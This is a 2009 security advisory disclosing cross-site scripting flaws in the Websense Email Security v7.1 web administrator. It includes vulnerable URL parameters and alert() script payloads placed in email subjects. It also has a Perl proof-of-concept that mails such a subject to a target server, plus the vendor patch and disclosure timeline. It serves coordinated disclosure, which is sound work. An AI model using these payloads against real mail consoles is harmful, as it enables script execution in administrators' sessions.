Title: Websense Email Security Cross Site Scripting Severity: Low Advisory ID: NSOADV-2009-003 Found Date: 28.09.2009 Date Reported: 01.10.2009 Release Date: 20.10.2009 Author: Nikolas Sotiriu Mail: nso-research (at) sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2009-003.txt Vendor: Websense (http://www.websense.com/) Affected Products: Websense Email Security v7.1 Personal Email Manager v7.1 Not Affected Products: Websense Email Security v7.1 Hotfix 4 Personal Email Manager v7.1 Hotfix 4 Remote Exploitable: Yes Local Exploitable: Yes Patch Status: Patched with Hotfix 4 Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: for the permission to use his Policy Background: =========== Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection. (Product description from Websense Website) The Websense Email Security Web Administrator is a webfrontend, which enables you to access the message administration, directory management and to view the log. Description: ============ 1. XSS in webfrontend: ---------------------- The webfrontend do not properly sanitize some variables before being returned to the user. http://<target>:8181/web/msgList/viewmsg/actions/msgAnalyse.asp ?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] &ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS] http://<target>:8181/web/msgList/viewmsg/actions/msgForwardToRis kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]& ServerName=[XSS] http://<target>:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= [XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS] This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the Web Administrator frontend. 2. XSS in webfrontend through a Mail Subject: --------------------------------------------- The Subject of an email sent through the Websense Mail Security server is not properly sanitized before shown in the Web Administrator frontend. Script code like "><script>alert('X')</script> will be executed in the users's browser in context of the Web Administrator frontend. The Mail has to be hold in a Queue to execute the code if the administrator checks it. A Subject like VIAGRA"><script>alert('XSS')</script> will result in a hold in the Anti Spam Queue. Proof of Concept : ================== #!/usr/bin/perl use MIME::Lite; use Net::SMTP; (($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0", "<server> <Recipient> \n"; my $from_address = '<xss (at) mail (dot) com [email concealed]>'; my $to_address = "<" . $rcpt . ">"; my $mail_host = $server; my $subject = 'VIAGRA XSS File "><BODY ONLOAD=alert(\'XSS\')>'; my $message_body = "XSS Test File"; $msg = MIME::Lite->new ( From => $from_address, To => $to_address, Subject => $subject, Type =>'multipart/mixed' ) or die "Error creating multipart container: $!\n"; $msg->attach ( Type => 'TEXT', Data => $message_body ) or die "Error adding the text message part: $!\n"; MIME::Lite->send('smtp', $mail_host, Timeout=>60); $msg->send; Solution: ========= Vendor released a patch. http://tinyurl.com/yhe3hqa Disclosure Timeline (YYYY/MM/DD): ================================= 2009.09.28: Vulnerability found 2009.10.01: Ask for a PGP Key 2009.10.01: Websense sent there PGP Key 2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure date to Vendor 2009.10.08: Websense verifies the finding 2009.10.13: Websense fixed it. The path will be available in Version 7.2 which will be released in ~2 weeks 2009.10.13: Ask for a list of affected versions/products and changed the release date to 2009.10.29. (no response) 2009.10.20: Found the KB article and the Hotfix on Websense website 2009.10.20: Release of this advisory